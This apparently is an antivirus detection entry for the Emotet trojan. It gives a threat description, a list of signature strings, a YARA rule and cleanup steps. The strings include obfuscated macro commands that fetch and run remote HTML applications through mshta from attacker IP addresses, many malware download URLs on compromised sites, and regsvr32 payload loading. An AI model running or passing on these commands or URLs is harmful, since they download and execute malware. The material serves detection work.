This detection indicates a file exhibiting characteristics of Emotet.B, a highly sophisticated and modular banking trojan and botnet. Emotet typically steals credentials, delivers other malware (like TrickBot and ransomware), and maintains persistence on infected systems. The presence of strings like 'keybd_event' suggests potential for keyboard monitoring, while numerous obfuscated PDB filenames are consistent with malware development practices.
Relevant strings associated with this threat:
- boot (PEHSTR_EXT)
- bios (PEHSTR_EXT)
- my huge entropy for rng.. blah (PEHSTR_EXT)
- =qc5v4234v5\\23v45234\\22345v2345.7Ru.pdb (PEHSTR_EXT)
- ciTfDCxMQU0a5/DDEyGwn8ta.z4.pdb (PEHSTR_EXT)
- 7laIR+|.XJ5aA0aa.pdb (PEHSTR_EXT)
- browsers.62pbasis.856Junder7O (PEHSTR_EXT)
- \rel\iMS-srvreg56.pdb (PEHSTR_EXT)
- Chen32.pdb (PEHSTR_EXT)
- m3KHLMcF.pdb (PEHSTR_EXT)
- rSVz/f9=GI0.pdb (PEHSTR_EXT)
- @dMlE|vKpq.pdb (PEHSTR_EXT)
- SKRFM.pdb (PEHSTR_EXT)
- JERJWHETW@##HREjwr.Pdb (PEHSTR_EXT)
- he#@1.Pdb (PEHSTR_EXT)
- heerhWHW#@1wHJnERbRW.Pdb (PEHSTR_EXT)
- EWH#@1wHJnERbRW.Pdb (PEHSTR_EXT)
- r.4YM4qhCz5DavnCoPhjjx.pdb (PEHSTR_EXT)
- kO@fbLLEFmk2I_M.pdb (PEHSTR_EXT)
- Pb730.pdb (PEHSTR_EXT)
- WhjrkehLkpe;rltjhpow;elkrjjklWEKL#.pdb (PEHSTR_EXT)
- sNQ.pdb (PEHSTR_EXT)
- +9!myD0iY5!ussu_svXy5bni8J8CU.pdb (PEHSTR_EXT)
- lehAh.pdb (PEHSTR_EXT)
- keybd_event (PEHSTR_EXT)
- @g-e3e_2qalAN+/PaKV/J.pdb (PEHSTR_EXT)
- SrQUFmG.pdb (PEHSTR_EXT)
- XrfZPp2C.pdb (PEHSTR)
- LQYutoXRJpQBI-zyVe.pdb (PEHSTR)
- t_D!Ay=VaDyaKDa.pdb (PEHSTR)
- erjRWJERJketkjQEWYHJ@#.Pdb (PEHSTR)
- ynmNa1OjKdUie.pdb (PEHSTR)
- JOe|OBzjATck#psb/.pdb (PEHSTR)
- hkhjggh.Pdb (PEHSTR)
- CryARr.pdb (PEHSTR)
- zYAamTGB2rfW!Cp+aR.pdb (PEHSTR)
- ewhwwherGW.Pdb (PEHSTR)
- hewrjkrkter#whrje@wg.Pdb (PEHSTR)
- uigjhghio.pdb (PEHSTR)
- QPK+LbZjb*4KV@InYQ*.pdb (PEHSTR)
- odubqa.pdb (PEHSTR)
- 7h4qMQ1edvEOY+wQIOdVR_v.pdb (PEHSTR)
- 3Vv@p=i8qg.ylQJxx!l.pdb (PEHSTR)
- HXe5+GENxShM.pdb (PEHSTR)
- 2ezUVGr!PtB.pdb (PEHSTR)
- iwJL##$@#*$^#%@!^$.pdb (PEHSTR)
- eTiq_WaEN__y9F89zLukjmM.pdb (PEHSTR)
- $.Pdb (PEHSTR_EXT)
- ErJIZwQ%B4X_#*TUuU32vx(c9_@8*C!Bi7dX7o (PEHSTR_EXT)
- 2ZTYXG7K5#RY+(uRRaE&LXIvF!+@>m779sEjBU)d(Mb3_!Z (PEHSTR_EXT)
- DllRegisterServer (PEHSTR_EXT)
- l##B+k&rB$cb^AHa54%*oDqeEuskFn8Vh@V4l (PEHSTR_EXT)
- |b= (SNID)
- b3& (SNID)
- = Replace(tysdjoighdlfkgnxlcdsf.TextBox1.Text, "wgja", "") (MACROHSTR_EXT)
- Text = "cwgjamd /wgjac swgjatarwgjat/wgjaB (MACROHSTR_EXT)
- .Tag = Cells(75, 1) + vbCrLf + Cells(77, 1) (MACROHSTR_EXT)
- Open "c:\programdata\vkwer.bat" (MACROHSTR_EXT)
- strMessage = " " & .Name & " , " & vbCr & _ (MACROHSTR_EXT)
- MsgBox Err.Description, vbCritical, " & " & Err.Number (MACROHSTR_EXT)
- cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/_.html (MACROHSTR_EXT)
- CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html (MACROHSTR_EXT)
- cmd /c m^sh^t^a h^tt^p^:/^/87.251.85.100/love3/_.html (MACROHSTR_EXT)
- ://www.preferredsupports.com/cli/rK9sG2/ (MACROHSTR_EXT)
- ://homdecorstation.com/wazf7j/tP4PH/ (MACROHSTR_EXT)
- ://savagerefinishe rinc.com/cgi-bin/Ny1/ (MACROHSTR_EXT)
- ://haqsonsgroup.com/css/LBHRIu/ (MACROHSTR_EXT)
- ://lauramarshall.com/cgi-bin/sxS8ctblr/ (MACROHSTR_EXT)
- ://burialinsurancelab.com/q5kje9/K1mF/ (MACROHSTR_EXT)
- ://lealracecars.com/donnacox/fVqOYBzAUoU/ (MACROHSTR_EXT)
- ://edgetactical.ritabilisim.com/admin/2jKBEGDY0XpcgxF7f/ (MACROHSTR_EXT)
- ://4seasonsflorals.com/yhedjkl/BYwyXorqDywx/ (MACROHSTR_EXT)
- ://boldconsulting.info/bkzh6v/eqbAgc3oMGBsC5VDn1w/ (MACROHSTR_EXT)
- FF = "mshta http://91.240.118.172/ss/hh.html" (MACROHSTR_EXT)
- =RpcereRpceplaRpcece("Gswec:Gswe\pGsweroGswegramGswedaGswetGswea\jledshf.bGsweat","Gswe","" (MACROHSTR_EXT)
- =wsRpceCriPRpcet.creRpceAteobRpceJEct(reRpceplaRpcece(" (MACROHSTR_EXT)
- .bat"," (MACROHSTR_EXT)
- SysWow64\ (MACROHSTR_EXT)
- \Windows\ (MACROHSTR_EXT)
- ://terrassa-cafe.com/9yjxnes/18p2S7bBrdpM6FrAc/ (MACROHSTR_EXT)
- ://moseletronicos.com/wp-content/5/ (MACROHSTR_EXT)
- ://sabaithaimass age.com.au/wp-admin/Hgbn3e/ (MACROHSTR_EXT)
- ://wiremax.avaspadan.com/admin/ItopibIZF3dxpy0/ (MACROHSTR_EXT)
- ://troopsites.com/wp-admin/CzMJm2vfbA4osSHH/ (MACROHSTR_EXT)
- FF = "mshta http (MACROHSTR_EXT)
- /91.2 (MACROHSTR_EXT)
- hh.html" (MACROHSTR_EXT)
- ://littlesweet.co.uk/wp-a dmin/vko/ (MACROHSTR_EXT)
- ://stratusebsolutions.co.nz/wp-content/wyE Ej5jH8xq50rp1/ (MACROHSTR_EXT)
- ://wvfsbrasil.com.br/Acrasieae/LIYNOqCthfZuCWQz3/ (MACROHSTR_EXT)
- ://lydt.cc/wp-includes/6sfYo/ (MACROHSTR_EXT)
- ://lpm.fk.ub.ac.id /Fox-C/faKwS6p6/ (MACROHSTR_EXT)
- regsvr32.exe (MACROHSTR_EXT)
- \rds.ocx (MACROHSTR_EXT)
- "B2L (PEHSTR_EXT)
- w"&"w"&"w.b"&"er"&"ek"&"et"&"ha"&"be"&"r.c"&"o"&"m/h"&"at"&"ax/f"&"ov"&"La"&"ro (MACROHSTR_EXT)
- b"&"os"&"ny.c"&"o"&"m/a"&"sp"&"ne"&"t_cl"&"ie"&"nt/E"&"rI5"&"F74"&"cw"&"ii"&"Oy"&"we (MACROHSTR_EXT)
- w"&"w"&"w.c"&"es"&"as"&"in.c"&"o"&"m.a"&"r/ad"&"mi"&"ni"&"str"&"at"&"or/H"&"C46"&"kH"&"DU"&"SY"&"N3"&"05"&"Gg"&"lC"&"P (MACROHSTR_EXT)
- b"&"en"&"ce"&"ve"&"nd"&"eg"&"ha"&"z.hu/w"&"p-in"&"cl"&"ud"&"es/t"&"XQ"&"Bs"&"gl"&"NO"&"Is"&"un"&"k (MACROHSTR_EXT)
- ://bosny.com/aspnet_client/NGTx1FUzq/ (MACROHSTR_EXT)
- ://www.berekethaber.com/hatax/c7crGdejW4380ORuxqR/ (MACROHSTR_EXT)
- ://bulldogironworksllc.com/temp/BBh5HHpei/ (MACROHSTR_EXT)
- B2L (PEHSTR_EXT)
- ://www.yedirenkajans.com/eski/y91J/ (MACROHSTR_EXT)
- ://yahir-fz.com/joy/ZnIjgkgZ18/ (MACROHSTR_EXT)
- ://www.wahkiulogistics.com.hk/upload/AvtsILsT00O/ (MACROHSTR_EXT)
- ://xenangifc.vn/wp-admin/CAzHLCrGgwXw6KTX0lMm/ (MACROHSTR_EXT)
- ://tvstv.yunethosting.rs/nesciuntquos/2SlrSdLBAv7/ (MACROHSTR_EXT)
- ://wahkiulogistics.com.hk/upload/rIpUmi7MrlOc/ (MACROHSTR_EXT)
- ://vanlaereict.nl/domains/T9G5ruQJ/ (MACROHSTR_EXT)
- ://usa-ltd.ie/wp-includes/0x7HPlZ8sGANiI5i/ (MACROHSTR_EXT)
- ://kmodo.us/cgi-bin/D/ (MACROHSTR_EXT)
- \hhwe1.ocx (MACROHSTR_EXT)
- \hhwe2.ocx (MACROHSTR_EXT)
- \hhwe3.ocx (MACROHSTR_EXT)
- :/"&"/z"&"o"&"o"&"m"&"p"&"ix"&"el.c"&"o"&"m.b"&"r/w"&"p-a"&"d"&"m"&"i"&"n/z"&"A"&"R"&"I"&"C"&"P"&"Z"&"w"&"7"&"f"&"F/ (MACROHSTR_EXT)
- ://b"&"p"&"s"&"j"&"a"&"m"&"b"&"i.i"&"d"&"/"&"a"&"b"&"o"&"u"&"t"&"/"&"R"&"T"&"Z"&"0"&"A"&"Q"&"1"&"/ (MACROHSTR_EXT)
- :/"&"/h"&"os"&"t"&"i"&"n"&"g"&"10"&"70"&"6"&"8.a"&"2"&"f"&"2"&"a.n"&"e"&"t"&"c"&"u"&"p.n"&"e"&"t/c"&"a"&"r"&"e"&"e"&"r/0"&"m"&"t"&"N"&"N"&"f"&"b"&"Z/ (MACROHSTR_EXT)
- ://a"&"g"&"i"&"t"&"a"&"si.i"&"d/m/q"&"L"&"C"&"Z"&"W"&"t/ (MACROHSTR_EXT)
- ://d"&"jh"&"o"&"s"&"t.n"&"l/8"&"H"&"O"&"i"&"c"&"o"&"B"&"u"&"f"&"Q"&"N"&"b"&"j"&"b"&"M/ (MACROHSTR_EXT)
- ://c"&"o"&"m"&"p"&"u"&"t"&"e"&"r"&"c"&"o"&"l"&"l"&"e"&"g"&"i"&"a"&"t"&"e.c"&"o"&"m.p"&"k/w"&"p-a"&"d"&"m"&"in/q"&"6"&"9"&"D"&"Z"&"X"&"4"&"k"&"K"&"Z"&"6"&"s"&"s"&"R"&"Q/ (MACROHSTR_EXT)
- ://w"&"w"&"w.a"&"dv"&"an"&"ce"&"ne"&"t.i"&"t/c"&"f"&"g/9"&"8X"&"Pj/ (MACROHSTR_EXT)
- ://a"&"n"&"a"&"m"&"a"&"f"&"e"&"g"&"a"&"r"&"c"&"i"&"a.e"&"s/c"&"s"&"s/V"&"G"&"B"&"J"&"h"&"j"&"p"&"u"&"1"&"9"&"e"&"C"&"b"&"q"&"8"&"g"&"b"&"Y"&"n"&"A/ (MACROHSTR_EXT)
- ://w"&"w"&"w.a"&"lu"&"g"&"u"&"e"&"l"&"d"&"e"&"br"&"i"&"n"&"q"&"u"&"e"&"d"&"o"&"s.b"&"a"&"r"&"u"&"e"&"r"&".b"&"r/w"&"p-c"&"on"&"te"&"nt/E"&"W"&"2"&"3"&"r"&"C"&"3"&"i"&"i"&"1"&"X"&"X/ (MACROHSTR_EXT)
- :"&"/"&"/c"&"ed"&"ec"&"o.e"&"s/j"&"s/n"&"7"&"4f"&"S/ (MACROHSTR_EXT)
- :"&"/"&"/b"&"al"&"ti"&"cc"&"on"&"tr"&"ol"&"bd.c"&"o"&"m/c"&"g"&"i-b"&"i"&"n/G"&"u0"&"xn"&"o0"&"kIs"&"sG"&"JF"&"8/ (MACROHSTR_EXT)
- ://f"&"ik"&"ti.b"&"e"&"m.g"&"un"&"ad"&"ar"&"ma.a"&"c.i"&"d/S"&"D"&"M/q"&"Ne"&"MU"&"e2"&"Rv"&"xd"&"vu"&"Rl"&"f/ (MACROHSTR_EXT)
- ://w"&"w"&"w.ca"&"re"&"of"&"u.c"&"o"&"m/P"&"HP"&"E"&"xc"&"el/s"&"Q7"&"8B"&"ed"&"ri"&"bN"&"JZ"&"bG"&"Yj/ (MACROHSTR_EXT)
- ://www.boraintercambios.com.br/wp-includes/AN4ixiH4Th/ (MACROHSTR_EXT)
- ://brigadir.com/bkp/SwrVs4yU/ (MACROHSTR_EXT)
- ://handboog6.nl/META-INF/f/ (MACROHSTR_EXT)
- ://brb-ljubuski.com/wp-content/2MODCk0UZasTCL6tm/ (MACROHSTR_EXT)
- g"&"sd"&"c.p"&"l/s"&"mi"&"ec"&"io/1"&"9V"&"Yf"&"hH"&"Lp/ (MACROHSTR_EXT)
- Iposiogseogjseiojgei (PEHSTR_EXT)
- opifoipw490fgsjgiseirhj (PEHSTR_EXT)
- kmnEGlDVCccMkxBiCNufvqMJKx (PEHSTR_EXT)
- DinxPcSbSYkurjlEKJbng (PEHSTR_EXT)
- |#d1e49aac-8f56-4280-b9ba-993a6d77406c (NID)
- }#d1e49aac-8f56-4280-b9ba-993a6d77406c (NID)
- |#75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 (NID)
- }#75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 (NID)
- &|#b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 (NID)
- &}#b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 (NID)
- y*|#56a863a9-875e-4185-98a7-b882c64b5ce5 (NID)
- y*}#56a863a9-875e-4185-98a7-b882c64b5ce5 (NID)
- C|#be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 (NID)
- C}#be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 (NID)
- L|#3b576869-a4ec-4529-8536-b80a7769e899 (NID)
- L}#3b576869-a4ec-4529-8536-b80a7769e899 (NID)
- |#5beb7efe-fd9a-4556-801d-275e5ffc04cc (NID)
- }#5beb7efe-fd9a-4556-801d-275e5ffc04cc (NID)
- |#01443614-cd74-433a-b99e-2ecdc07bfc25 (NID)
- }#01443614-cd74-433a-b99e-2ecdc07bfc25 (NID)
- |#d3e037e1-3eb8-44c8-a917-57927947596d (NID)
- }#d3e037e1-3eb8-44c8-a917-57927947596d (NID)
- |#7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c (NID)
- }#7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c (NID)

rule Trojan_Win64_Emotet_BA_2147818857_0
{
    meta:
        author = "threatcheck.sh"
        detection_name = "Trojan:Win64/Emotet.BA!MTB"
        threat_id = "2147818857"
        type = "Trojan"
        platform = "Win64: Windows 64-bit platform"
        family = "Emotet"
        severity = "Critical"
        info = "MTB: Microsoft Threat Behavior"
        signature_type = "SIGNATURE_TYPE_PEHSTR_EXT"
        threshold = "2"
        strings_accuracy = "Low"
    strings:
        $x_1_1 = {8b cb 48 8d 7f ?? f7 eb [0-4] ff c3 8b c2 c1 e8 ?? 03 d0 6b c2 ?? 2b c8 48 8b 05 ?? ?? ?? ?? 48 63 d1 0f b6 0c 02 32 4c 3e ?? 88 4f ?? 49 ff cf 75} //weight: 1, accuracy: Low
        $x_1_2 = {f7 ef c1 fa ?? 83 c7 ?? 8b c2 c1 e8 ?? 03 d0 48 8b 05 ?? ?? ?? ?? 48 63 d2 48 6b d2 ?? 48 03 d0 41 8a 04 10 41 32 04 34 88 06} //weight: 1, accuracy: Low
        $x_1_3 = "DllRegisterServer" ascii //weight: 1
    condition:
        (filesize < 20MB) and
        (2 of ($x*))
}

Immediately isolate the affected system from the network to prevent further spread or command and control communication. Perform a full system scan with updated antivirus software, then remove all detected malicious files. Change all user passwords on the affected system, especially for banking and sensitive accounts. Consider reimaging the system if full confidence in removal cannot be achieved, and review network logs for any outbound Emotet-related traffic.